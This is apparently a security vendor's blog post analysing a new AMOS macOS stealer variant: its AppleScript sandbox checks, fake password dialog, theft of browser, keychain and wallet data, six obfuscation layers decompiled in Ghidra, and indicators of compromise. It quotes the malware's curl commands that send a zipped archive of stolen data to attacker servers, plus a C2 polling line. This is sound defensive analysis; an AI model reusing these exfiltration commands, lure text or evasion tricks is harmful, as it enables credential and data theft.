A previously undocumented AMOS stealer variant compromised a macOS endpoint. No known hashes, no C2 data in any public database. Our SOC dismantled six layers of obfuscation, extracted every indicator, and pushed protection to all SOC customers within hours, before the wider industry had even seen the sample.

When an alert fires in our SOC, the clock starts. But not just for the affected customer, for every customer we protect. In the modern threat landscape, the most dangerous moment for any organization is the intelligence gap: that window of time between a new malware variant being deployed and the rest of the world finding out it exists.

For a standalone security team, this gap is a period of extreme vulnerability. You are essentially waiting for a vendor update or a public signature feed that hasn't been written yet. But for our customers, that gap is closed by the power of our inhouse developed Shared Threat Intelligence.

This blogpost is the technical breakdown of how we dismantled a previously undocumented AMOS (Atomic macOS Stealer) variant. It's a story of moving from a single compromised endpoint to rapid deployment of detection and blocking capabilities across customer environments.

The Incident: A unknown IOC Scenario

The alert arrived on March 12, 2026 at 06:25 local time. A macOS endpoint had been compromised. By the time our SOC began analysing the artefacts, we were looking at a situation every threat analyst dreads: No known file hashes, C2 IP addresses, or meaningful behavioral signatures existed in public databases at the time of detection.

The full architecture of the attack only became clear during the subsequent deep-dive analysis. We discovered that the infection relied on a 15.7 MB macOS Universal Binary (x86_64 and ARM64) dropped at /private/tmp/helper. This sample was not readily available on the system; our team had to reconstruct the infection chain and simulate the original delivery request to manually retrieve the binary from the attacker's infrastructure.

Stage 1: Sandbox checks

Before the malicious stealer itself was executed on the machine, an Apple Script payload had already executed. Every string in it, every file path, every shell command, every URL, was encoded using three custom arithmetic functions:

on ipbgcjzgqa(a, b)
    -- result[i] = chr(a[i] - b[i])

on kwcvvjininv(a, b)
    -- result[i] = chr(a[i] + b[i])

on xqylheckjx(a, b, offset)
    -- result[i] = chr(a[i] - b[i] - offset)

None of the strings appear anywhere in plaintext. What looked like meaningless integer arrays at first glance decoded, once we had reversed the encoding scheme, to a complete, fully operational data theft and exfiltration framework.

We decoded every array in the script statically. The results were unambiguous:

Download URL: https[:]//woupp[.]com/n8n/update
Exfil server: http[:]//92[.]246[.]136[.]14/contact
Exfil method: curl --connect-timeout 120 --max-time 300 -X POST -F "file=@/tmp/out.zip"

The download URL was deliberately crafted to impersonate a legitimate n8n workflow automation update, a tool commonly used by developers and DevOps engineers. This is not a random choice. It signals a targeted campaign aimed at technically sophisticated users, not generic end users who might install cracked software.

The Anti-Sandbox Check

Before any download occurred, the script ran a dedicated VM and sandbox detection routine. We also recovered a standalone anti-sandbox script from the incident artefacts:

set urgufr  to do shell script "system_profiler SPMemoryDataType"
set qcsvjxp to do shell script "system_profiler SPHardwareDataType"

The results were then checked against two lists. The first checked for virtualisation markers in memory data:

"QEMU"   "VMware"   "KVM"

The second checked hardware identifiers against a set of known analysis machine serial numbers:

"Z31FHXYQ0J"     -- known sandbox machine serial
"C07T508TG1J2"   -- known sandbox machine serial
"C02TM2ZBHX87"   -- known sandbox machine serial
"Chip: Unknown"  -- emulation indicator
"Intel Core 2"   -- legacy/VM indicator

If any match was found: exit 100, complete termination. On a real MacBook Pro with an Apple Silicon chip, all checks pass silently and execution continues. This is a professional-grade sandbox evasion technique, and it was running before a single byte of the binary had been downloaded.

Simple but effective privilege escalation: The fake password dialog

The decoded script also contained the text used for privilege escalation via social engineering:

Title:   "Application wants to install helper"
Prompt:  "Required Application Helper. Please enter device
          password to continue."
Button:  "Continue"

This dialog is displayed using a standard macOS display dialog call with with hidden answer, visually indistinguishable from a legitimate macOS authorisation prompt. The entered password was used to invoke login -pf <username>, elevating the process to root before the binary was ever executed.

What the Script Collected

Once the binary had run, the osascript continued its own collection workflow, targeting every category of sensitive data on the system. We decoded all collection paths and targets:

Browser data (all Chromium browsers + Safari):

/Login Data          /Cookies            /Web Data
/Local Extension Settings/   /IndexedDB/   /Local Storage/leveldb/

macOS Keychain:

~/Library/Keychains/login.keychain-db  -- accessed directly via cat

Apple Notes

Complete content exported as HTML with count header

Local files

Desktop and Documents, up to 30 MB, targeting:

pdf  doc  docx  xls  xlsx  ppt  pptx  txt  rtf
key  p12  pem  cert  pfx  sql  db  sqlite
json  xml  yaml  conf  env  csv

Cryptocurrency wallets

A hardcoded list of 200+ browser extension IDs targeting every major wallet including MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI, and Exodus.

After collection, everything was staged in a randomly-named temporary directory and sent:

ditto -c -k --sequesterRsrc <staging_dir> /tmp/out.zip
curl --connect-timeout 120 --max-time 300 -X POST \
  -H "user: <uuid>" -H "BuildID: <hw_profile>" \
  -F "file=@/tmp/out.zip" laislivon[.]com/contact

Cleanup followed immediately:

rm -r <staging_dir>
rm /tmp/out.zip

Stage 2: Reverse Engineering the 'helper' Binary

The helper binary is where this analysis gets deep. This is a purpose-built, professionally obfuscated macOS executable designed to be as difficult as possible to analyse statically, and it is the part of this investigation that required the most significant reverse engineering effort.

All analysis was performed using Ghidra with our custom ARM64 analysis workflow.

File Properties

Property	Value
Format	Mach-O Universal Binary
Architectures	x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000)
Size	15.7 MB
MD5	`4599fdf2fa2099b30d8bbf76703dd634`
SHA-1	`3992edfb6f885ae5f09f3e69a2578048d6d5bb54`
SHA-256	`5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d`

It Starts Before main()

The first thing we confirmed in Ghidra was that this binary does not behave like a normal executable. The real entry point is not main(). It is a function registered in __mod_init_func, a macOS mechanism that instructs the dynamic linker (dyld) to execute designated functions automatically when the binary is loaded, before any user-visible code runs.

The init function at 0x10009f384 is the true entry point of the malware. We decompiled the output with Ghidra:

// FUN_10009f384 @ 0x10009f384
// __mod_init_func registered — executes before main()void FUN_10009f384(void)
{
  int iVar1;
// Anti-sandbox delay: usleep(0x37e) = 894 microseconds
iVar1 = _usleep(0x37e);
// Indirect jump table — 14-state machine// Defeats CFG reconstruction in static analysis tools
(_(code _)((ulong)switchD_10009f43c::switchdataD_1000cd3fc * 4 + 0x10009f440))(iVar1);
return;
}

Two things are immediately notable. First, the 894-microsecond usleep at startup, an anti-sandbox timing signal. Second, and more significantly, the indirect jump table at 0x10009f43c. This is a computed branch where the target address is calculated at runtime from a lookup table. Static analysis tools cannot reconstruct the control flow graph from this, Ghidra itself logs multiple "unreachable block" warnings as it tries and fails to trace the execution path. This is deliberate.

The jump table drives a 14-state execution machine. Each state performs one discrete step of the decryption and execution pipeline. The state counter is updated after each step, and the machine loops until all states have executed.

The ARM64 Disassembly of the State Dispatcher

10009f3fc:  stp xzr,xzr,[sp, #0x48]
10009f41c:  mov w0,#0x37e
10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox
10009f424:  cmp w25,#0xd             ; state counter < 14?
10009f428:  b.hi 0x10009fd44         ; exit if done
10009f42c:  mov w8,w25               ; current state index
10009f430:  adr x9,0x10009f440       ; base of jump table
10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table
10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address
10009f43c:  br x9                    ; indirect branch, CFG broken here

Six Obfuscation Layers, Stacked

The binary uses six distinct obfuscation layers, stacked and chained so that the output of each feeds the next. Every payload, every string, every internal constant is encoded. Nothing meaningful appears in plaintext anywhere in the __const segment. What follows is a complete layer-by-layer breakdown, verified directly in Ghidra, down to the individual ARM64 instructions. While each individual technique used in this binary is known in isolation, their chained application across multiple stages created a highly interdependent execution flow that significantly increased the complexity of static and dynamic analysis.

Layer 1 — Compile-Time Triplet Encoding

Every string in the binary is stored not as characters, but as a sequence of 12-byte arithmetic triplets. Each triplet (a, b, shift) encodes exactly one output character. The encoding scheme is applied at compile time — meaning no string ever exists as plaintext in the binary, not even transiently during loading.

Two separate decoder functions handle different string sizes. FUN_100087c08 at 0x100087c08 decodes 60-character strings (720 bytes of input data from DAT_1006292cc). FUN_10007ad80 at 0x10007ad80 decodes 56-character strings (672 bytes from DAT_10049708c). Both use the identical algorithm.

// FUN_100087c08 @ 0x100087c08
// Triplet decoder, 60 chars, data from DAT_1006292ccvoid FUN_100087c08(long *param_1)
{
  long *plVar1;
  void *pvVar2;
  long lVar3;
  uint *puVar4;
pvVar2 = operator_new(0x2d0); // allocate 720 bytes (60 triplets × 12)
_memcpy(pvVar2, &DAT_1006292cc, 0x2d0); // copy encoded triplets from __const
FUN_1000a0840(param_1, 0x3c, 0); // init 60-char output buffer
lVar3 = 0;
puVar4 = (uint _)((long)pvVar2 + 8);
do {
plVar1 = (long _)_param_1;
if (-1 < _(char _)((long)param_1 + 0x17)) {
plVar1 = param_1;
}
// THE DECODE FORMULA, one character per triplet:
// char = ((b _ 3) XOR a) >> shift) - b
_(char _)((long)plVar1 + lVar3) =
(char)((int)(puVar4-1 * 3 ^ puVar4-2) >> (*puVar4 & 0x1f)) - (char)puVar4-1;
lVar3 = lVar3 + 1;
puVar4 = puVar4 + 3; // advance 12 bytes — next triplet
} while (lVar3 != 0x3c); // loop exactly 60 times
operator_delete(pvVar2);
return;
}

And the corresponding ARM64 assembly, each instruction maps directly to one operation in the formula:

100087c48:  add x9,x20,#0x8
100087c4c:  ldp w10,w11,[x9, #-0x8]   ; load a → w10,  b → w11
100087c50:  add w12,w11,w11, LSL #0x1 ; w12 = b + (b << 1) = b * 3
                                       ; (compiler avoids MUL instruction)
100087c54:  eor w10,w12,w10           ; w10 = (b*3) XOR a
100087c58:  ldr w12,[x9], #0xc        ; w12 = shift value; post-increment by 12
100087c5c:  asr w10,w10,w12           ; arithmetic right shift — sign bit preserved
100087c60:  sub w10,w10,w11           ; subtract b — final decoded character
100087c74:  strb w10,[x11, x8, LSL ]  ; store one byte to output buffer
100087c78:  add x8,x8,#0x1
100087c7c:  cmp x8,#0x3c              ; loop counter vs. 60
100087c80:  b.ne 0x100087c4c          ; continue until all 60 chars decoded

One detail worth noting: the multiplication b × 3 is implemented as add w12, w11, w11, LSL #1, a shift-and-add that avoids a multiplication instruction entirely. This is a classic compiler optimisation that also makes the code harder to pattern-match in signature databases.

The complete decode formula:

char = ASR( (b × 3) XOR a, shift ) − b

The ASR (arithmetic shift right) is critical. It preserves the sign bit. If the intermediate result of (b×3) XOR a is negative, which it frequently is, a logical shift would produce a different result entirely. This is intentional, and means that simply reimplementing the formula with >> in a higher-level language will silently produce wrong output unless the signed arithmetic is handled correctly.

The 56-character variant FUN_10007ad80 is structurally identical, operating on DAT_10049708c with a loop limit of 0x38. Both functions were confirmed live from Ghidra during this analysis.

Layer 2 — Hex String Encoding

The raw bytes produced by Layer 1 are themselves ASCII hex characters, not binary data. The output of a Layer 1 triplet decode is a string of hex pairs: 32694e5462.... This is confirmed by the decoder function FUN_100000dc0 at 0x100000dc0, which implements a hex-decode using a lookup table at DAT_1007bb591.

The Ghidra decompile shows a switch statement mapping each hex character (0x30-0x39, 0x41-0x46, 0x61-0x66) to its nibble value, assembling output bytes two characters at a time:

// FUN_100000dc0 @ 0x100000dc0// Hex decoder, processes input two characters per output byteswitch(*(undefined1 *)((long)plVar2 + lVar7)) {
  case 0x30: break;                  // '0' → 0x00
  case 0x31: bVar9 = 0x10; break;   // '1' → 0x10
  case 0x32: bVar9 = 0x20; break;   // '2' → 0x20
  // ... '3' through '9' ...
  case 0x41: case 0x61: bVar9 = 0xa0; break;  // 'A'/'a' → 0xa0
  case 0x42: case 0x62: bVar9 = 0xb0; break;  // 'B'/'b' → 0xb0
  case 0x43: case 99:   bVar9 = 0xc0; break;  // 'C'/'c' → 0xc0
  case 0x44: case 100:  bVar9 = 0xd0; break;  // 'D'/'d' → 0xd0
  case 0x45: case 0x65: bVar9 = 0xe0; break;  // 'E'/'e' → 0xe0
  case 0x46: case 0x66: bVar9 = 0xf0; break;  // 'F'/'f' → 0xf0
}
// Second nibble from lookup table at DAT_1007bb591
*(byte *)((long)pppppppuVar3 + uVar8) =
    (&DAT_1007bb591)[(ulong)uVar4 & 0xff] | bVar9;

The ARM64 assembly drives this with a secondary computed-branch table, effectively implementing a 55-entry jump table for the switch:

100000e5c:  adr x17,0x100000e6c      ; base of case-dispatch table
100000e60:  ldrb w0,[x12, x16, LSL ] ; load offset for this hex char
100000e64:  add x17,x17,x0, LSL #0x2 ; compute dispatch address
100000e68:  br x17                   ; jump — second computed branch in 24 bytes

Two computed branches within a 24-byte window. Static analysis tools struggle badly with this pattern because both targets are unknown at analysis time.

A 137,208-character hex string decodes to 68,604 bytes. These 68,604 bytes then feed Layer 3.

Layer 3 — Custom 16-Symbol Nibble Alphabet

The 68,604 output bytes from Layer 2 use only 16 unique byte values, drawn from two non-contiguous ASCII ranges:

0x20-0x2F: space, !, ", #, $, %, &, ', (, ), *, +, ,, -, ., /
0x78-0x7F: x, y, z, {, |, }, ~, DEL

This is a deliberate choice. In a hex editor, these bytes look like whitespace, punctuation, and end-of-ASCII-range characters — they blend into what looks like metadata or padding, not encoded data. A human analyst doing a quick visual scan of a hex dump will not flag these byte ranges as suspicious. Standard entropy analysis will also undercount the effective entropy because the byte distribution appears non-random.

Each byte from this alphabet encodes one nibble of the actual payload. The alphabet-to-nibble mapping is applied by the encode/decode function FUN_100000d60, which we confirmed at 0x100000d60. It chains two sub-functions: FUN_100000b50 builds an indexed map of the input string's characters, and FUN_100000c34 walks this map, consuming 6 bits per step and accumulating output bytes 8 bits at a time:

// FUN_100000c34 @ 0x100000c34, nibble accumulator
iVar5 = 0;
do {
  local_52 = *(undefined1 *)puVar4;
  lVar3 = FUN_1000a078c(param_3, &local_52);  // look up nibble value
  if (lVar3 == 0) {
    // character not in alphabet, treat as raw
    FUN_1000a078c(param_3, &local_51);
  } else {
    iVar5 = iVar5 + 4;           // accumulate 4 bits
    while (7 < iVar5) {
      std::string::push_back((char)param_1);  // emit byte when 8+ bits ready
      iVar5 = iVar5 + -8;
    }
  }
  puVar4 = (undefined8 *)((long)puVar4 + 1);
} while (puVar4 != puVar1);

The 34,302 bytes that emerge from this pass are 99.7% printable ASCII, the payload at this stage looks like a large shell script or configuration blob to a superficial inspection.

Layer 4, Compile-Time String Obfuscation

Short strings used internally are obfuscated at compile time using the same triplet scheme as Layer 1. These strings are reconstructed at runtime immediately before use and never persist in memory, they are consumed by the next operation and then the buffer is freed. At no point is a decoded string visible in the binary's static data sections.

The string hash function FUN_100000730 provides a secondary obfuscation layer for string comparisons. Rather than comparing strings directly, which would leave plaintext in memory for pattern-matching, the binary computes and compares integer hashes:

// FUN_100000730 @ 0x100000730// FNV-style string hash, avoids plaintext string comparisonsint FUN_100000730(char *param_1)
{
  int iVar4 = 0x19a8;    // FNV offset basis (modified)
  // ...
  for (; uVar3 != 0; uVar3 = uVar3 - 1) {
    iVar4 = (int)*pcVar1 + iVar4 * -0x7fb91be3;  // FNV-1a style multiply
    pcVar1 = pcVar1 + 1;
  }
  return iVar4;
}

The ARM64 implementation replaces the multiply with a fused multiply-add:

100000744:  mov w0,#0x19a8            ; FNV basis
100000750:  mov w10,#0xe41d
100000754:  movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3
100000758:  ldrsb w11,[x8], #0x1      ; load char, post-increment
10000075c:  madd w0,w0,w10,w11        ; w0 = w0 * 0x8046e41d + char
100000760:  subs x9,x9,#0x1
100000764:  b.ne 0x100000758

This means that even comparing two strings inside the binary never produces a branch that a debugger can intercept cleanly at the string level — only at the hash level.

Layer 5 — Dual-Instance Custom Stream Cipher

This is where the obfuscation architecture becomes genuinely unusual. There are not one but two separate cipher instances running in the binary, each with a different hardcoded lookup table and a different starting counter. Both use the same algorithm structure, but they produce different output alphabets for different parts of the payload pipeline.

Instance A — FUN_10007ab34 at 0x10007ab34:

// Instance A, start counter 0x4c, table @ 0x100496f8b
uVar6 = 0x4c;
do {
  bVar2 = *(byte *)((long)local_e0 +
          ((ulong)(*(byte *)((long)local_c8 + uVar5) ^ uVar6) & 0xff));
  *(byte *)((long)plVar1 + uVar5) = bVar2;
  uVar6 = (int)uVar5 + (uVar6 ^ bVar2);  // counter: i + (counter XOR output)
  uVar5 = uVar5 + 1;
} while (uVar7 != uVar5);

Instance B, FUN_10007a7e0 at 0x10007a7e0:

// Instance B, start counter 0x9f, different table @ 0x100496e0a region
uVar6 = 0x9f;
do {
  bVar2 = *(byte *)((long)local_c0 +
          ((ulong)(*(byte *)((long)local_a8 + uVar5) ^ uVar6) & 0xff));
  *(byte *)((long)plVar1 + uVar5) = bVar2;
  uVar6 = (int)uVar5 + (uVar6 ^ bVar2);  // identical counter update formula
  uVar5 = uVar5 + 1;
} while (uVar7 != uVar5);

The algorithm is structurally identical but the starting counter differs (0x4c vs 0x9f) and the lookup tables are at different memory addresses. Instance A is called from state 11 of the state machine to produce the encoding alphabet for the first payload path. Instance B is called from state 6 to produce the alphabet for the large shell script payload decode.

To be precise about what this cipher is: it is a substitution cipher with a counter-dependent index. Each output byte is a table lookup where the index is (input_byte XOR counter) & 0xFF. The counter updates as counter = (i + (counter XOR output)) & 0xFF after each byte, meaning each output byte feeds back into determining the next lookup index. This creates a dependency chain across the entire output sequence: you cannot decrypt byte N without having correctly decrypted bytes 0 through N−1. This property makes partial decryption or fault analysis significantly harder.

Neither instance is standard RC4. There is no S-Box initialisation phase and no S-Box swap operation. The lookup tables are static, pre-computed constants baked into the binary at compile time.

Layer 6 — Runtime XOR with Exit-Code Dependent Key

The final and most analytically defeating layer applies an in-place XOR transformation to the Stage 2 payload. The XOR key is not hardcoded. It is computed at runtime from the exit code of the first shell payload execution, meaning it cannot be determined by any form of static analysis. The binary must actually execute, the first shell script must run to completion, and only then does the key exist.

The key derivation sequence in the ARM64 state machine dispatcher:

; After shell_exec_via_pipe #1 returns, exit code is in w0
10009f838:  ubfx w8,w0,#0x8,#0x8     ; extract bits [15:8] of exit status
10009f83c:  mov w9,#0x7f0             ; multiplier constant
10009f840:  madd w8,w8,w9,w26         ; key = (exit_byte × 0x7f0) + base_counter
10009f844:  and w24,w8,#0xffff        ; mask to 16-bit key → stored in w24

The XOR loop that processes the Stage 2 payload:

; In-place XOR, every byte of the payload is XORed with w24
10009fc34:  ldrb w10,[x8, x9, LSL ]  ; load payload byte
10009fc48:  eor w10,w10,w24          ; XOR with key
10009fc4c:  strb w10,[x8, x9, LSL ]  ; write decrypted byte in place

The key is a 16-bit value derived from the exit status byte of the first shell payload, multiplied by 0x7f0 and added to the current value of the state machine's base counter register w26. The multiplication constant 0x7f0 means that even a single-bit difference in the exit code produces a completely different key, there is no exploitable continuity between adjacent key values.

Without executing the binary in a controlled environment and capturing the exact exit code of the first shell payload, the Stage 2 payload is permanently opaque to static analysis. This is the single hardest barrier we encountered in this entire analysis.

Shell Execution: Pipes, Not Arguments, and SIMD XOR

The shell execution function FUN_10000091c at 0x10000091c is architecturally the most interesting piece of the binary. It is where everything comes together, the decoded payload, the obfuscated command name, and the deliberate anti-forensic design. Every individual design decision in this function is intentional and serves a specific evasion purpose.

Step 1: The command name is never in plaintext

The string /bin/zsh does not exist anywhere in the binary. It is stored in the __cstring section at 0x1007bb5c8 as the obfuscated bytes \x01LG@\x01T]F. The decoding happens at runtime using a single XOR operation, confirmed directly in the ARM64 assembly:

; FUN_10000091c — command name decode via SIMD XOR
100000960:  adrp x8,0x1007bb000
100000964:  add x8,x8,#0x5c8          ; x8 → "\x01LG@\x01T]F" in __cstring
100000968:  ldr x8,[x8]               ; load 8 obfuscated bytes as uint64
10000096c:  str x8,[sp, #0x20]
100000970:  strb wzr,[sp, #0x28]      ; null terminator

100000974:  ldr d0,[sp, #0x20]        ; load into SIMD register d0
100000978:  movi v1.8B,#0x2e          ; broadcast 0x2e to all 8 lanes of v1
10000097c:  eor v0.8B,v0.8B,v1.8B    ; XOR all 8 bytes simultaneously
100000980:  str d0,[sp, #0x20]        ; store decoded "/bin/zsh"

100000988:  mov w8,#0x732d            ; 0x732d = "-s" (little-endian)
10000098c:  strh w8,[sp, #0x4]        ; store argument string

The XOR key is 0x2e, the ASCII value of . (period). The decode is performed in a single eor v0.8B, v0.8B, v1.8B, an ARM64 NEON vector instruction that XORs all 8 bytes of the string simultaneously. Using a SIMD instruction for a simple 8-byte decode is unusual and serves two purposes: it is faster than a byte-by-byte loop, and it generates a fundamentally different instruction pattern that signature-matching tools trained on scalar decode loops will not flag.

The verification is trivial: 0x01 XOR 0x2e = 0x2f = /, 0x4c XOR 0x2e = 0x62 = b, 0x47 XOR 0x2e = 0x69 = i, 0x40 XOR 0x2e = 0x6e = n — producing /bin in the first four bytes.

Step 2: The pipe architecture

After decoding the command name, the function creates an OS pipe and forks:

100000990:  bl 0x1000a0f6c    ; _fork()
100000994:  mov x20,x0        ; save PID
100000998:  cbz w0,0x100000b00 ; if child: jump to exec path

In the child process:

; Child process path
100000b0c:  mov w1,#0x0
100000b10:  bl 0x1000a0f48    ; _dup2(pipe_read_fd, STDIN=0)
; pipe read-end is now stdin, shell reads from pipe
100000b2c:  add x0,sp,#0x20   ; argv[0] = "/bin/zsh"
100000b30:  add x1,sp,#0x8    ; argv array
100000b34:  bl 0x1000a0f60    ; _execvp("/bin/zsh", ["/bin/zsh", "-s", NULL])

The child replaces its standard input with the read end of the pipe, then executes /bin/zsh -s. The shell in -s mode reads commands from stdin. From a process monitoring perspective, this process appears as /bin/zsh -s with no arguments — which is indistinguishable from a legitimate interactive shell session.

Step 3: Variable-size chunk writes

The parent process writes the decrypted payload to the pipe write end in deliberately variable-sized chunks:

; Parent: compute chunk size then write
1000009d4:  umulh x8,x23,x24       ; high-half multiply for modulo
1000009d8:  lsr x8,x8,#0x7
1000009dc:  msub x8,x8,x25,x23     ; x8 = length % 0xc0
1000009e0:  add x8,x8,#0x40        ; chunk = (length % 192) + 64
                                    ; range: 64 to 255 bytes per write
1000009e4:  cmp x8,x23             ; clamp to remaining length
1000009e8:  csel x2,x8,x23,cc

1000009ec:  ldr w0,[sp, #0x34]     ; pipe write fd
1000009f0:  mov x1,x21             ; payload pointer
1000009f4:  bl 0x1000a0fc0         ; _write(fd, buf, chunk_size)

100000a04:  mov w0,#0x1
100000a08:  bl 0x1000a0fa8         ; _usleep(1), 1µs between chunks
100000a0c:  add x21,x21,x22        ; advance pointer
100000a10:  sub x23,x23,x22        ; reduce remaining count
100000a14:  cbnz x23,0x1000009d4   ; loop until done

The chunk size formula (remaining_length % 192) + 64 produces values between 64 and 255 bytes per write call, varying with the remaining payload length. This variable-chunk approach means that the write pattern, visible in kernel event tracing tools like ktrace or dtrace, does not produce a recognisable fixed-size signature. Each execution of the same payload produces a different sequence of write() syscall sizes.

The 1-microsecond usleep between chunks serves a secondary purpose: it yields the CPU between writes, keeping the process's CPU utilisation flat and avoiding a sudden spike that a behavioural EDR rule might flag as anomalous burst I/O.

Step 4: Immediate memory wipe

; After all chunks written and pipe closed:
100000a20:  ldrb w8,[x19, #0x17]   ; check string storage type
100000a24:  sxtb w9,w8
100000a28:  ldp x10,x11,[x19]
100000a30:  csel x0,x10,x19,lt     ; pointer to payload buffer
100000a34:  csel x1,x11,x8,lt      ; length of buffer
100000a38:  bl 0x1000a0f30         ; _bzero(payload_buf, length)

The _bzero() call zeroes the entire decrypted payload buffer immediately after the last byte has been written to the pipe. There is no point in time, not even a microsecond, where the decrypted payload exists in memory after execution is complete. A live memory dump taken the instant after this function returns will find only zeroes where the payload was.

This is called zero-after-use and is the same technique used in high-assurance cryptographic libraries to prevent secret key material from persisting in memory. Seeing it in commodity malware is unusual and indicates a developer with a security engineering background.

The complete execution sequence:

__cstring:  "\x01LG@\x01T]F"   (7 bytes, obfuscated)
    ↓  SIMD XOR with 0x2e (8-wide vector)
stack:      "/bin/zsh\0"         (decoded in-place, stack only)
    ↓  _pipe() creates fd pair [read=local_60, write=local_5c]
    ↓  _fork()
    │
    ├─ CHILD:  _dup2(local_60, 0)   stdin = pipe read end
    │          _execvp("/bin/zsh", ["/bin/zsh", "-s", NULL])
    │          → /bin/zsh reads commands from stdin (= pipe)
    │
    └─ PARENT: loop: _write(local_5c, payload, variable_chunk)
                     _usleep(1)
               _close(local_5c)    close write end → EOF to shell
               _bzero(payload, len) ← WIPE IMMEDIATELY
               _waitpid(child, ...)

The Import Table as a Weapon

The complete import table of this binary is:

// C runtime / memory
_memcpy       _memmove      _memset       _bzero

// Process execution
_fork         _execvp       _execl        __exit

// IPC / pipes
_pipe         _dup2         _close        _write

// Synchronisation
_waitpid      _usleep

// Stack protection
___stack_chk_fail    ___stack_chk_guard

// C++ runtime
operator.new    operator.delete    __Unwind_Resume
___cxa_allocate_exception    ___cxa_throw    ___cxa_begin_catch
___cxa_end_catch    ___cxa_free_exception    ___gxx_personality_v0
terminate    logic_error    bad_array_new_length    __next_prime

// STL containers
append    reserve    push_back    operator=

// Dynamic linking
dyld_stub_binder

The total import count is 27 symbols. What is missing is as significant as what is present.

Absent — networking:

socket      connect     bind        listen
accept      send        recv        sendto
recvfrom    getaddrinfo gethostbyname

Absent — file system:

open        read        fopen       fread
fwrite      fclose      stat        unlink
mkdir       rename      opendir     readdir

Absent — process introspection:

getpid      getuid      getenv      sysctl

Absent: Cryptography

CCCrypt     SecItemAdd  SecKeychainFind

In a traditional malware sample, you expect to see imports for networking (socket, connect) or file manipulation (fopen, write). This binary has none. To a standard scanner, this binary looks like a harmless process launcher. This is a deliberate architectural choice to bypass static analysis tools that flag suspicious API usage.

The helper binary does not perform the theft itself. Its sole purpose is to drop and execute the real malicious payload: a heavily obfuscated AppleScript. A standalone EDR or AV looking for "malicious binaries" will see a loader with no network or file I/O capabilities and potentially grant it a "clean" verdict. It misses the fact that the binary is a specialized delivery system for a high-level script payload.

The Backdoor

The incident did not end after the initial compromise. Microsoft Defender telemetry showed a process running from /Users/<redacted>/.mainhelper, polling an external server:

sh -c "curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'"

The Base64 string decodes to a 16-byte device UUID, the unique identifier assigned to this machine by the attacker's C2 infrastructure on the day of the initial infection.

The .mainhelper binary (SHA-256: 7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063) had been installed by the osascript dropper via ditto on the day of the incident.

The Power of the Collective Shield: Our Exclusive Shared Threat Intelligence Platform

When an alert fires in our SOC, the clock doesn't just start for the affected customer, it starts for every organization under the glueckkanja shield. This investigation into a previously undocumented AMOS variant highlights the critical nature of the intelligence gap: that dangerous window where traditional vendors are blind because they haven't seen the threat yet.

This is where our proprietary Shared Threat Intelligence Platform, developed exclusively for our glueckkanja CSOC customers, proves its decisive worth. We don't wait for industry updates; we create them. While our analysts were still dismantling the final layers of the ARM64 assembly, our Automated Orchestration Engine was already distributing the extracted indicators across our entire ecosystem. This creates an immediate herd immunity effect, where a discovery at a single endpoint becomes a blocked threat for every organization we protect within minutes.

Reactive security is a relic of the past when facing threats designed to slip through the cracks of conventional defenses. The answer lies in combining human expertise with an architecture that can deploy that knowledge instantly and at scale. When these insights are channeled through our shared intelligence model, the attacker's time advantage can be transformed into a liability, protecting our customers even before a threat is recognized by the wider industry.

Note on Data Privacy
Identifying information has been anonymised in this publication. Specific technical details, indicators, and timestamps may have been slightly altered to ensure the continued protection of the affected environment while maintaining the full technical integrity of the analysis.
The technical analysis and indicators of compromise (IOCs) provided in this report are for illustrative and educational purposes only. This information is provided on a "best effort" basis. glueckkanja AG makes no warranties, express or implied, regarding the completeness or accuracy of the data and shall not be held liable for any damages, losses, or security incidents resulting from the use or implementation of the information, rules, or signatures shared herein. Users are strongly advised to validate all indicators and rules in a controlled environment before deployment.
Indicators and techniques described may overlap with known malware families and are not exclusive to a single campaign.